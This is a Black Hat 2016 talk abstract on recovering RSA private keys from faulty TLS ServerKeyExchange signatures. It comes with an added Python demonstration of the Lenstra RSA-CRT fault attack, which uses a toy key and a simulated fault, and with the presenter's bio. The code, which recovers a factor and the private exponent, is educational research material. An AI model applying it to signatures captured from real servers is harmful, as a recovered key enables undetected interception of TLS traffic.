Recover a RSA Private Key from a TLS Session with Perfect Forward Secrecy

Presented at Black Hat USA 2016, Aug. 3, 2016, 3 p.m. (50 minutes).

They always taught us that the only thing that can be pulled out of an SSL/TLS session using strong authentication and the latest Perfect Forward Secrecy ciphersuites is the public key of the certificate exchanged during the handshake: an insufficient condition for mounting a MiTM attack without raising alarms about the validity of the TLS connection and of the certificate itself. However, this is not always true. In certain circumstances it is possible to derive the server's private key regardless of the size of the modulus in use. Even RSA keys of 4096 bits can be factored at the cost of a few CPU cycles and computational resources. All that is needed is the generation of a faulty digital signature by the server, an event that can be observed when certain conditions occur, such as CPU overheating, RAM errors or other hardware faults. Because of these premises, devices like firewalls, switches, routers and other embedded appliances are more exposed than traditional IT servers or clients. During the talk, the author will explain the theory behind the attack, how common the factors are that make it possible, and his custom practical implementation of the technique. At the end, a proof-of-concept, able to work both in passive mode (i.e. only by sniffing the network traffic) and in active mode (namely, by participating directly in the establishment of TLS handshakes), will be released.
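As an added illustration (this is not code from the talk or from its proof-of-concept), the following Python reproduces the mechanism the abstract relies on in the setting it describes. In TLS 1.2 with an (EC)DHE ciphersuite the server signs client_random || server_random || the key-exchange parameters with its RSA key using RSASSA-PKCS1-v1_5 (RFC 5246 section 7.4.3), and every byte of that signed input is visible to a passive observer. Assuming, as the abstract's description implies, that the fault corrupts one half of an RSA-CRT signing computation, the classic Lenstra fault attack (gcd of sig^e - EM with N) yields a prime factor of the modulus from a single bad signature, whatever the key size. The RSA key below is a deterministic toy built from Mersenne primes so the example needs no prime generation; the handshake values are constructed, not captured; the single-bit fault is simulated.

```python
import hashlib
import math

# Toy RSA key, constructed inline for this example. Mersenne primes are used
# only so the example is deterministic; a real key uses random primes, but
# the recovery below does not depend on the size of N.
P = (1 << 521) - 1
Q = (1 << 607) - 1
N = P * Q
E = 65537
K = (N.bit_length() + 7) // 8          # modulus length in bytes
D = pow(E, -1, (P - 1) * (Q - 1))      # reference private exponent

# CRT material, as an RSA-CRT implementation keeps it.
DP = pow(E, -1, P - 1)
DQ = pow(E, -1, Q - 1)
QINV = pow(Q, -1, P)

# DER DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def pkcs1_v15_encode(message: bytes) -> int:
    """EMSA-PKCS1-v1_5 encoding of SHA-256(message), returned as an int < N."""
    t = SHA256_PREFIX + hashlib.sha256(message).digest()
    ps = b"\xff" * (K - len(t) - 3)
    return int.from_bytes(b"\x00\x01" + ps + b"\x00" + t, "big")


def crt_sign(em: int, fault_in_q: bool = False) -> int:
    """RSA-CRT signature (Garner recombination). With fault_in_q the mod-q half
    is corrupted by one flipped bit, simulating a hardware fault mid-signing."""
    sp = pow(em, DP, P)
    sq = pow(em, DQ, Q)
    if fault_in_q:
        sq ^= 1 << 17          # any corruption of this half works equally well
    h = (QINV * (sp - sq)) % P
    return sq + Q * h


def signature_is_valid(sig: int, em: int) -> bool:
    """Plain RSA verification: what a passive observer runs on every
    ServerKeyExchange signature to spot a faulty one."""
    return pow(sig, E, N) == em


def recover_factor(sig: int, em: int) -> int:
    """Lenstra's observation: if one CRT half was correct, sig^e == em holds
    modulo that prime only, so gcd(sig^e - em, N) is a nontrivial factor.
    Returns 0 when the signature is good (or both halves were corrupted)."""
    g = math.gcd((pow(sig, E, N) - em) % N, N)
    return g if 1 < g < N else 0


def recover_private_exponent(sig: int, em: int) -> int:
    """Rebuild d from the recovered factor; 0 if nothing leaked."""
    p = recover_factor(sig, em)
    if not p:
        return 0
    q = N // p
    return pow(E, -1, (p - 1) * (q - 1))


def server_key_exchange_signed_data(client_random: bytes, server_random: bytes,
                                    params: bytes) -> bytes:
    """TLS 1.2: the ServerKeyExchange signature covers client_random ||
    server_random || ServerECDHParams, all of which appear on the wire."""
    return client_random + server_random + params


# Constructed sample handshake values (not from a real capture). The params
# bytes are a placeholder ECDHE share: curve_type=named_curve, secp256r1,
# 65-byte uncompressed point (zeroed here).
CLIENT_RANDOM = bytes(range(32))
SERVER_RANDOM = bytes(range(32, 64))
ECDH_PARAMS = bytes.fromhex("03001741") + bytes(65)


def demo() -> dict:
    data = server_key_exchange_signed_data(CLIENT_RANDOM, SERVER_RANDOM, ECDH_PARAMS)
    em = pkcs1_v15_encode(data)
    good = crt_sign(em)
    bad = crt_sign(em, fault_in_q=True)
    return {
        "good_valid": signature_is_valid(good, em),
        "bad_valid": signature_is_valid(bad, em),
        "good_leaks": recover_factor(good, em),      # 0: a correct signature leaks nothing
        "recovered_p": recover_factor(bad, em),      # equals P: the fault hit the q half
        "d_matches": recover_private_exponent(bad, em) == D,
    }


if __name__ == "__main__":
    print(demo())
```

The verification step doubles as the detection logic for the passive mode the abstract mentions: verify every observed ServerKeyExchange signature against the server's certificate, and feed any that fails into recover_factor. The same gcd also tells a defender whether a failed signature was actually exploitable, and it is why RSA-CRT implementations verify their own output before releasing it.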


Presenters:

  • Marco Ortisi - ENCS (European Network for CyberSecurity)
    Marco Ortisi works as Senior Penetration Tester at ENCS (European Network for Cyber Security), where he is fully involved in increasing the security of European critical infrastructures such as energy grids and in reducing the gap with classical IT systems. A netizen since 1996, he has literally grown up on "bread and vulnerability research," a fascinating field that leads him to continuously study new attack techniques and, at the same time, to develop alternative defense methods. Prior to this role at ENCS, Marco worked as an Independent Penetration Tester and Security Consultant in different sectors (telco, governmental, utility, banking, pharmaceutical, financial, etc.), helping to improve the IT security posture of several big companies and organizations operating in EMEA (Europe, the Middle East and Africa).
